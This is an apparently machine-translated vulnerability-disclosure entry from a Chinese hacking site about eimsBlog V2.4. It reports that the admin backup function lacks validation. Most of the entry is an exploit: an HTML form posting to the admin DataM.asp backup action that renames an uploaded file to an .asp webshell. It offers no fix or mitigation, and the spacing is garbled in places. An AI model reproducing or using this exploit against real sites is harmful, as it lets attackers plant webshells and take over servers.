eimsBlog system V2. 4 0day vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201028522
Type myhack58
Reporter 佚名
Modified 2010-12-08T00:00:00


Background backup function of the lack of validation, leading to local submit backup and recovery shell. asp

Vulnerability testing exp:

<table width="9 8%" border="0" cellspacing="1" cellpAdding="1" align="center" class="table">

<form method="post" action="url/admin/DataM. asp? eims=Data&Action=bfstart">

<tr><td colspan="2"><div class="title">eimsBlog system Pday By yboy</div></td></tr>

<tr><td colspan="2"><font color="red">first upload the shell in the current directory</font></td></tr>

<tr><td width="2 0%" align="right">webshell address:</td>

<td><input name="olddata" type="text" id="olddata" value="" size="<% =InputSize %>" ></td></tr>

<tr><td align="right">name:</td>

<td><input name="newdata" type="text" id="newdata" size="<% =InputSize %>" value="yboy. asp"></td></tr>

<tr><td align="right"></td><td><input type="submit" name="Submit" value="fuck" /></td></tr> </form> </table>